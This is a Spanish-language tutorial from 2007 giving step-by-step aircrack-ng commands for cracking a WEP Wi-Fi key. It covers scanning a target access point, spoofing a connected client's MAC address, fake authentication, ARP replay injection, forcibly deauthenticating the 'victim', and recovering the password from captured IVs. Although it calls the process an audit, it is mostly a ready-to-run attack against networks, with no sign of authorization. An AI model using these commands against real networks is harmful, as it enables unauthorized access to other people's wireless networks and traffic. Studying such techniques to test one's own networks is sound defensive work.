www.tuxapuntes.com

1. SCANEAMOS UN OBJETIVO Y ANOTAMOS DATOS.


#sudo airodump-ng --ivs --write scaneo ath1

Guardara un log en el fichero scanneo. Qui nos fijamos en un AP, que tenga trafico y que tenga uncliente asociado, asi pues apuntaremos en un papelito los siguientes datos : ( es un ejemplo )

Datos de prueba, en tu caso serán otros:
ESSID   (nombre del wifi)   : WLAN_XX
BSSID   (Mac del router AP) : 00:11:22:33:44:55
STATION (MAC Cliente  )     : 66:77:88:99:99:99

apuntamos tambien : CHANNEL DEL ESSID.

* Para que esto tenga exito asegurado es necesario fijarse que el objetivo que queremos auditar, tenga una STATION, conectada y sobre todo que este generando algo de trafico en DATA.

2. ( creamos en modo monitor el interface ath1 )

# airmon-ng start wifi0

3. ( configuramos interface con MAC, victima)

# ifconfig ath1 down
# iwconfig ath1 channel          (canal de victima que anotamos)
# macchanger -m <mac> ath1       (mac STATION que anotamos)   
# ifconfig ath1 rate 1M          (solo en caso poca fuerza señal)

# ifconfig ath1 up

4. (nos autentificamos en el ap de la victima )

#aireplay-ng -1 0 -e WLAN_XX -a 00:11:22:33:44:55 -h 66:77:88:99:99:99 ath1

5. (Lanzamos el airodump, en el canal  apuntado )


#sudo airodump-ng --ivs --write wlan_xx --channel 7 ath1

- almacenara un fichero llamado wlan_xx, con los ivs que capturemos y que necesitaremos para poder ejecutar posteriormente el aircrack.

6. (Lanzamos el ataque )

#aireplay-ng -3 -b 00:11:22:33:44:55 -h 66:77:88:99:99:99 ath1


7. (Forzamos desautentificacion de la victima)

#aireplay-ng -0 0 -a 66:77:88:99:99:99 -c 00:11:22:33:44:55 ath1

- nos fijamos que la ventana lanzada en el punto 5, empieza a capturar pasados unos minutos, un monton de trafico en DATA asi como en la ventana del ataque número 6, se comienzan a capturar y enviar paquetes ARP.

- Si esto marcha como digo, solo nos queda salir a tomarnos un cafe y dejar el portatil trabajar , despues de un par de horas .. cuando tengamos un fichero lo sufientenmente lleno de IVS. Pasamos al paso 8.

8. ( cuando tengamos suficientes IVS , EJECUTAMOS AIRCRACK )

#aircrack-ng -y wlan_xx.ivs

Aqui decimos cual es el BSSID, que queremos descifrar y no creo que tarde ni 5 segundos en darte la passord.

Comparteme:

Revisado el: 05-08-2007 17:30